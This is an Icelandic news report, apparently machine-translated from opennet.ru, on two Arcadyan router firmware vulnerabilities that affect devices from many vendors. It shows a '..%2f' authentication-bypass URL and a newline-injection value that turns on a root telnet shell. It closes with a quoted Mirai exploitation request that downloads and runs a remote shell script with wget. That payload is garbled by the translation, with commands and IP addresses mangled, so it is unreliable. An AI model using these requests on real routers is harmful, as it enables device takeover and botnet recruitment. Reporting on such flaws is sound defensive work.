Varnarleysi í heimabeinum sem hefur áhrif á 17 framleiðendur

Gríðarleg árás hefur verið skráð á netið gegn heimabeinum þar sem vélbúnaðinn notar HTTP netþjónsútfærslu frá Arcadyan fyrirtækinu. Til að ná yfirráðum yfir tækjum er sambland af tveimur veikleikum notuð sem gerir fjarframkvæmd á handahófskenndum kóða með rótarréttindum. Vandamálið hefur áhrif á nokkuð breitt úrval af ADSL beinum frá Arcadyan, ASUS og Buffalo, svo og tækjum sem fást undir vörumerkjum Beeline (vandamálið er staðfest í Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone og önnur fjarskiptafyrirtæki. Það er tekið fram að vandamálið hefur verið til staðar í Arcadyan vélbúnaðar í meira en 10 ár og á þessum tíma hefur tekist að flytja til að minnsta kosti 20 tækjagerða frá 17 mismunandi framleiðendum.

Fyrsta varnarleysið, CVE-2021-20090, gerir það mögulegt að fá aðgang að hvaða vefviðmótsskrift sem er án auðkenningar. Kjarninn í varnarleysinu er að í vefviðmótinu eru sumar möppur sem myndir, CSS skrár og JavaScript forskriftir eru sendar um aðgengilegar án auðkenningar. Í þessu tilviki eru möppur þar sem aðgangur án auðkenningar er leyfður, skoðaðar með því að nota upphafsgrímuna. Að tilgreina „../“ stafi í slóðum til að fara í móðurskrána er læst af fastbúnaðinum, en því er sleppt að nota „..%2f“ samsetninguna. Þannig er hægt að opna verndaðar síður þegar sendar eru beiðnir eins og „http://192.168.1.1/images/..%2findex.htm“.

Annað varnarleysið, CVE-2021-20091, gerir auðkenndum notanda kleift að gera breytingar á kerfisstillingum tækisins með því að senda sérsniðnar færibreytur á application_abstract.cgi forskriftina, sem athugar ekki hvort nýlínustafur sé til staðar í færibreytunum . Til dæmis, þegar þú framkvæmir ping-aðgerð, getur árásarmaður tilgreint gildið „192.168.1.2%0AARC_SYS_TelnetdEnable=1“ í reitnum með IP-tölu sem verið er að haka við, og handritið, þegar stillingaskráin /tmp/etc/config/ er búin til .glbcfg, mun skrifa línuna “AARC_SYS_TelnetdEnable=1” inn í hana “, sem virkjar telnetd þjóninn, sem veitir ótakmarkaðan aðgang að stjórnskel með rótarréttindum. Á sama hátt, með því að stilla AARC_SYS færibreytuna, geturðu keyrt hvaða kóða sem er á kerfinu. Fyrsta varnarleysið gerir það mögulegt að keyra vandræðalegt handrit án auðkenningar með því að opna það sem “/images/..%2fapply_abstract.cgi”.

Til að nýta sér veikleika verður árásarmaður að geta sent beiðni á netgáttina sem vefviðmótið er í gangi á. Miðað við gangverk útbreiðslu árásarinnar, skilja margir rekstraraðilar eftir aðgangi á tækjum sínum frá ytra neti til að einfalda greiningu á vandamálum af stuðningsþjónustunni. Ef aðgangur að viðmótinu er takmarkaður við innra netið er hægt að gera árás frá utanaðkomandi neti með því að nota „DNS rebinding“ tæknina. Veikleikar eru nú þegar virkir notaðir til að tengja beina við Mirai botnetið: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Tenging: loka User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_212.192.241.7paddress=0. 1%0A ARC_SYS_TelnetdEnable=212.192.241.72& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://777/lolol.sh; krulla+-O+http://0/lolol.sh; chmod+4+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Type=XNUMX

Heimild: opennet.ru

Bæta við athugasemd